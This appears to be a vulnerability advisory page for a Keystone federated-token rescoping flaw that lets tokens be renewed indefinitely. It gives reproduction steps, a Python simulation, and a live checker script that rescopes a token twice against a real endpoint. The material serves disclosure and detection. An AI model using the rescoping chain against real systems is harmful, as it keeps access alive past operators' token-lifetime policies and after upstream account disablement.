CVE-2026-44394
Description
An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin returns response data without an expires_at value. The token provider falls back to issuing a token with a fresh default TTL. By rescoping repeatedly before each token expires, a user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This is a variant of CVE-2012-3426. Only deployments using federated identity (SAML2, OpenID Connect) are affected.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenStack Keystone federated token rescoping fails to propagate original token expiry, allowing federated users to bypass TTL policies and maintain access indefinitely.
Vulnerability
An authentication expiry bypass vulnerability exists in OpenStack Keystone's federated token rescoping mechanism (a variant of CVE-2012-3426). In keystone/auth/plugins/mapped.py, the handle_scoped_token() function constructs the response data but omits the expires_at attribute. When a federated user rescopes a token via POST /v3/auth/tokens, the token provider falls back to default_expire_time() instead of inheriting the original token's remaining lifetime, issuing a token with a fresh default TTL (typically 3600 seconds) [1]. This affects Keystone versions >=14.0.0 <27.0.2, >=28.0.0 <28.0.2, and >=29.0.0 <29.0.2. Only deployments using federated identity (SAML2, OpenID Connect) are vulnerable [2].
Exploitation
An attacker with a valid federated token can repeatedly call POST /v3/auth/tokens to rescope the token before it expires. Each successful rescope returns a new token with a full default TTL, as the original token's expires_at is not propagated [1]. No additional authentication or special privileges are required beyond possession of a valid federated token. The attacker can chain rescopes indefinitely to maintain continuous access.
Impact
By repeatedly rescoping, a federated user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This allows persistent access even after the user's account has been disabled at the upstream Identity Provider [1][2]. The impact is a breach of authentication policy enforcement, potentially leading to prolonged unauthorized access to Keystone-protected resources.
Mitigation
Upgrade to Keystone version 27.0.2, 28.0.2, or 29.0.2 (or later) as these releases include fixes that propagate the original token's expires_at during federated rescoping [2]. Patch reviews are available at the links provided in the advisory [2]. No workarounds have been disclosed for this vulnerability.
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing propagation of the original token's expires_at value in the federated token rescoping code path causes newly issued tokens to receive a fresh default TTL instead of inheriting the remaining lifetime."
Attack vector
An attacker with a valid federated token (obtained via SAML2 or OpenID Connect) sends a POST /v3/auth/tokens request with method=token and a project scope to rescope the token. Because the handle_scoped_token() function in keystone/auth/plugins/mapped.py omits the expires_at field from the response data [ref_id=1], the token provider falls back to default_expire_time() and issues a token with a fresh TTL. By repeating this rescoping operation before each token expires, the attacker can maintain access indefinitely, bypassing operator-configured token lifetime policies [CWE-613].
Affected code
The vulnerability is in keystone/auth/plugins/mapped.py, specifically the handle_scoped_token() function (lines 72-114), which constructs response data without including an expires_at attribute [ref_id=1]. The non-federated counterpart in keystone/auth/plugins/token.py (line 136) correctly preserves the original token's expiry via response_data.setdefault('expires_at', token.expires_at). The fallback logic in keystone/token/provider.py (lines 322-325) then defaults to a fresh expiration because the auth context lacks an explicit expiry [ref_id=1].
What the fix does
Reference [ref_id=1] reports that no patch had been published at the time it was written; the advisory cited in the Mitigation section above names 27.0.2, 28.0.2 and 29.0.2 as the fixed releases. The remediation is to propagate the original token's expires_at value in the federated rescoping code path, mirroring the non-federated path in keystone/auth/plugins/token.py, where response_data.setdefault('expires_at', token.expires_at) is called so that the provider never falls back to default_expire_time() for a rescoped token. Until a fixed release is deployed, operators should use short-lived token TTLs and monitor for repeated rescoping activity; a short TTL does not break the chain, since every rescope restores a full TTL, but it forces the holder to rescope more often, which makes the activity easier to spot.
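The following Python model shows the mechanism described in the Vulnerability section and in the Attack vector, Affected code and What the fix does entries above: a federated plugin that omits expires_at, the non-federated plugin that preserves it, the provider fallback to a fresh default TTL, and the effect of chaining rescopes against each. It is an added example and not Keystone's own code; the Token class, the plugin and provider functions, the 3600-second DEFAULT_TTL (the typical value the page quotes) and the timestamps are simplified stand-ins for keystone/auth/plugins/mapped.py, keystone/auth/plugins/token.py and keystone/token/provider.py.

```python
"""Model of the federated rescoping expiry bug. Added example, not Keystone code."""
from datetime import datetime, timedelta, timezone

DEFAULT_TTL = timedelta(seconds=3600)  # stands in for the [token]/expiration default
T0 = datetime(2026, 5, 28, 12, 0, tzinfo=timezone.utc)  # constructed start time


class Token:
    """Minimal stand-in for a Keystone token: who it belongs to and when it dies."""

    def __init__(self, user_id, expires_at, project_id=None, federated=False):
        self.user_id = user_id
        self.expires_at = expires_at
        self.project_id = project_id
        self.federated = federated


def default_expire_time(now):
    # Stand-in for keystone.token.provider.default_expire_time()
    return now + DEFAULT_TTL


def token_plugin_rescope(token, response_data):
    # Non-federated path (token.py): the original expiry is carried over.
    response_data["user_id"] = token.user_id
    response_data.setdefault("expires_at", token.expires_at)


def mapped_plugin_rescope_vulnerable(token, response_data):
    # Federated path before the fix (mapped.py): expires_at is never set.
    response_data["user_id"] = token.user_id


def mapped_plugin_rescope_fixed(token, response_data):
    # Remediation the page describes: propagate expires_at as token.py does.
    response_data["user_id"] = token.user_id
    response_data.setdefault("expires_at", token.expires_at)


def issue_token(plugin, token, project_id, now):
    # Provider fallback: use the auth context's expiry if present, else a fresh TTL.
    response_data = {}
    plugin(token, response_data)
    expires_at = response_data.get("expires_at") or default_expire_time(now)
    return Token(token.user_id, expires_at, project_id, token.federated)


def chain_rescopes(plugin, token, project_id, start, rounds, interval):
    """Rescope up to `rounds` times, once every `interval`, stopping when the
    current token has expired (a real Keystone would answer 401 there).
    Returns (rescopes completed, expiry of the last token held)."""
    now = start
    completed = 0
    for _ in range(rounds):
        now += interval
        if now >= token.expires_at:
            break
        token = issue_token(plugin, token, project_id, now)
        completed += 1
    return completed, token.expires_at


def demo():
    """Ten attempted rescopes, 30 minutes apart, of a one-hour federated token."""
    original = Token("fed-user", T0 + DEFAULT_TTL, federated=True)
    every_30m = timedelta(minutes=30)
    vulnerable = chain_rescopes(mapped_plugin_rescope_vulnerable, original, "proj", T0, 10, every_30m)
    fixed = chain_rescopes(mapped_plugin_rescope_fixed, original, "proj", T0, 10, every_30m)
    native = chain_rescopes(token_plugin_rescope, original, "proj", T0, 10, every_30m)
    return vulnerable, fixed, native


if __name__ == "__main__":
    for label, (n, expiry) in zip(("vulnerable mapped", "fixed mapped", "token.py"), demo()):
        print(f"{label:18s} rescopes={n:2d} final expiry={expiry.isoformat()}")
```

With the vulnerable plugin all ten rescopes succeed and the last token expires six hours after the original was issued; with either expiry-preserving plugin the second rescope is already refused because the chained token still expires at the original hour.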
Preconditions
- config: OpenStack Keystone must be deployed with federated identity enabled (auth methods include 'mapped')
- auth: Attacker must possess a valid federated token obtained via an upstream SAML2 or OpenID Connect Identity Provider
- config: allow_rescope_scoped_token must be set to true (the default)
- network: Network access to the Keystone API endpoint (POST /v3/auth/tokens)
Reproduction
1. Obtain a federated unscoped token via GET /v3/OS-FEDERATION/identity_providers/{idp}/protocols/mapped/auth.
2. Rescope the token to a project via POST /v3/auth/tokens with method=token and scope=project.
3. Observe that the rescoped token receives a fresh TTL instead of inheriting the original token's expiry.
4. Repeat the rescoping before expiry to extend access indefinitely [ref_id=1].
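A checker for steps 2 to 4, as an added example that is not part of the advisory or of Keystone: it validates the expiry of a federated token already obtained in step 1, rescopes it to a project with the Identity v3 token method, and reports whether the new expires_at was inherited or extended, then rescopes once more to show the chain. It assumes the environment variables OS_AUTH_URL (a hypothetical v3 endpoint), OS_TOKEN (the federated token) and OS_PROJECT_ID; the pure helpers parse_expires_at, build_rescope_body and classify_rescope run offline on constructed values.

```python
"""Live rescoping-expiry check. Added example, not advisory or Keystone code."""
import json
import os
import sys
from datetime import datetime, timezone
from urllib import request

# Keystone serialises expires_at in UTC, e.g. 2026-05-28T13:00:00.000000Z
ISO_FORMATS = ("%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%SZ")


def parse_expires_at(value):
    for fmt in ISO_FORMATS:
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError(f"unrecognised expires_at: {value!r}")


def build_rescope_body(token_id, project_id):
    # Identity v3 'token' auth method with a project scope
    return {"auth": {"identity": {"methods": ["token"], "token": {"id": token_id}},
                     "scope": {"project": {"id": project_id}}}}


def classify_rescope(original_expires_at, rescoped_expires_at, tolerance_s=1):
    """'inherited' when the new token expires no later than the original (fixed
    behaviour); 'extended' when it expires later (the bug on this page)."""
    delta = (parse_expires_at(rescoped_expires_at)
             - parse_expires_at(original_expires_at)).total_seconds()
    return "extended" if delta > tolerance_s else "inherited"


def _call(method, url, headers, body=None):
    data = json.dumps(body).encode() if body is not None else None
    req = request.Request(url, data=data, method=method, headers=headers)
    req.add_header("Content-Type", "application/json")
    with request.urlopen(req, timeout=15) as resp:
        return resp.headers, json.load(resp)


def validate_token(auth_url, token_id):
    # GET /v3/auth/tokens returns the subject token's body, including expires_at
    _, body = _call("GET", f"{auth_url}/auth/tokens",
                    {"X-Auth-Token": token_id, "X-Subject-Token": token_id})
    return body["token"]["expires_at"]


def rescope(auth_url, token_id, project_id):
    # POST /v3/auth/tokens with method=token; the new token id comes back in X-Subject-Token
    headers, body = _call("POST", f"{auth_url}/auth/tokens", {},
                          build_rescope_body(token_id, project_id))
    return headers["X-Subject-Token"], body["token"]["expires_at"]


def main():
    auth_url = os.environ["OS_AUTH_URL"].rstrip("/")
    token_id = os.environ["OS_TOKEN"]
    project_id = os.environ["OS_PROJECT_ID"]
    original = validate_token(auth_url, token_id)
    new_token, rescoped = rescope(auth_url, token_id, project_id)
    verdict = classify_rescope(original, rescoped)
    print(f"original expires_at: {original}")
    print(f"rescoped expires_at: {rescoped} ({verdict})")
    # One more hop from the rescoped token: 'extended' twice in a row is the chain.
    _, second = rescope(auth_url, new_token, project_id)
    print(f"second rescope expires_at: {second} ({classify_rescope(rescoped, second)})")
    return verdict


if __name__ == "__main__":
    sys.exit(0 if main() == "inherited" else 1)
```

The script exits non-zero when the first rescope already extends the lifetime, which is the observation in step 3; a one-second tolerance absorbs clock skew between the validation and the rescope responses.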
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 2
News mentions: 0
No linked articles in our index yet.